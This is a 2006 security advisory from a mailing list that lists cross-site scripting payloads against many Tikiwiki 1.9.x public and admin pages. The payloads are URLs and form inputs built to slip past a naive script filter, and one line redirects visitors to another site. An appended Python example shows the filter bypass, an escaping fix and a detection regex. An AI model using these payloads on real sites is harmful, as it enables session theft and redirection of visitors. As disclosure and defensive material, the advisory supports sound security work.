Network Security Vuln-Dev
Multiple XSS Vulnerabilities in Tikiwiki 1.9.x

Subject: Multiple XSS Vulnerabilities in Tikiwiki 1.9.x
Date: 25 May 2006 16:42:12 -0000
Multiple XSS Vulnerabilities in Tikiwiki 1.9.x
 
Discovered by Blwood
http://www.blwood.net
 
** Public **
 
-------------
 
Tiki-lastchanges
 
http://www.site.com/tiki-lastchanges.php?days=3&offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E
 
http://www.site.com/tikiwiki-1.9.3.1/tiki-lastchanges.php?days=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&offset=0&sort_mode=user_desc
 
-------------

Tiki-orphan_pages.php
 
http://www.site.com/tikiwiki-1.9.3.1/tiki-orphan_pages.php?find=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&offset=&sort_mode=flag_desc
 
http://www.site.com/tikiwiki-1.9.3.1/tiki-orphan_pages.php?find=&offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=flag_desc
 
-------------
 
Tiki-listpages.php
 
http://www.site.com/tiki-listpages.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=creator_desc
 
http://www.site.com/tiki-listpages.php?initial=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=pageName_asc
 
-------------
 
Tiki-remind_password.php

http://tikiwiki.org/tiki-remind_password.php

"><scr<script>ipt>alert('Blwood')</scr</script>ipt>
 
-------------
 
 
** Admin **
 
-------------
 
Tiki-admin_include_metatags.php
 
http://www.site.com/tiki-admin.php?page=metatags
 
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
In all pages the source will be:
 
<meta name="keywords" content=""><script>alert('Blwood')</script>" />
 
The code will be executed in every page!
 
Exploit:
 
"><sc<script>ript>document.location='http://www.blwood.net'</scr</script>ipt>
 
-------------
 
Tiki-admin_rssmodules.php
 
http://www.site.com/tiki-admin_rssmodules.php?offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&sort_mode=name_desc&rssId=1
 
-------------
 
Tiki-syslog.php
 
http://www.site.com/tiki-syslog.php?find=&max=10&offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&sort_mode=loguser_desc
 
http://www.site.com/tiki-syslog.php?find=&max=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&offset=0&sort_mode=logtype_desc
 
-------------
 
Tiki-adminusers.php
 
http://www.site.com/tiki-adminusers.php?find=&search=find&numrows=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&sort_mode=login_asc
 
In the form:
 
"><scr<script>ipt>alert('Blwood')</scr</script>ipt>
 
-------------
 
Tiki-admin_hotwords.php
 
"><sc<script>ript>alert('Blwood')</scr</script>ipt>

-------------
 
Tiki-admin_modules.php
 
Assign new module
**********************
 
Parameters: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
 

Create new user module
****************************
 
Name: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
-------------
 
Tiki-admin_notifications.php
 
Add notification:
 
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
http://www.site.com/tiki-admin_notifications.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=object_desc
 
-------------
 
Tiki-admin_dsn.php
 
Name: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
Dsn: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
-------------
 
Tiki-admin_content_templates.php
 
http://www.site.com/tiki-admin_content_templates.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=created_asc
 
Create new template:
 
Name: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
-------------
 
Tiki-admin_chat.php
 
http://www.site.com/tiki-admin_chat.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=name_desc&channelId=1
 
-------------
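The `<scr<script>ipt>` shape used in every payload above is built to survive a sanitizer that deletes the literal `<script>` token once: removing the inner tag re-joins the outer one. The following Python example, added here and not part of Blwood's post or of Tikiwiki's code, reproduces the advisory's meta-tag output under such a hypothetical single-pass filter, shows that attribute-context escaping of the same value neutralizes it, and flags the split-tag shape in a request URL for detection; the filter and the regex are assumptions for illustration, not Tikiwiki's implementation.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the advisory's first tiki-lastchanges.php URL, as it
# would appear in a web server access log (host and names are the post's own).
SAMPLE_URL = (
    "http://www.site.com/tiki-lastchanges.php?days=3&offset="
    "%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E"
)

# Assumed detection pattern: a tag name interrupted by a complete inner tag,
# e.g. <scr<script>ipt> or </scr</script>ipt>.
SPLIT_TAG = re.compile(r"</?[a-z]*</?[a-z]+>[a-z]*>", re.IGNORECASE)


def decode_params(url):
    """URL-decode the query string into {name: first value}, as the server sees it."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def naive_strip_filter(value):
    """Hypothetical sanitizer (not Tikiwiki's): deletes <script> and </script>
    once, non-recursively. Deleting the inner tag re-joins the split outer one."""
    return value.replace("<script>", "").replace("</script>", "")


def escape_attr(value):
    """Mitigation: HTML-escape the value for an attribute context, quotes included."""
    return html.escape(value, quote=True)


def render_meta_keywords(value, sanitizer):
    """Emit the keywords meta tag from the advisory with `sanitizer` applied."""
    return '<meta name="keywords" content="%s" />' % sanitizer(value)


def flag_suspicious_params(url):
    """Detection: names of parameters whose decoded value carries a split-tag shape."""
    return sorted(k for k, v in decode_params(url).items() if SPLIT_TAG.search(v))


if __name__ == "__main__":
    offset = decode_params(SAMPLE_URL)["offset"]
    print("flagged:", flag_suspicious_params(SAMPLE_URL))
    print("naive  :", render_meta_keywords(offset, naive_strip_filter))
    print("escaped:", render_meta_keywords(offset, escape_attr))
```

With the naive filter the rendered tag is byte-for-byte the line the advisory quotes; with escaping the only `<` left in the output is the meta tag's own.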
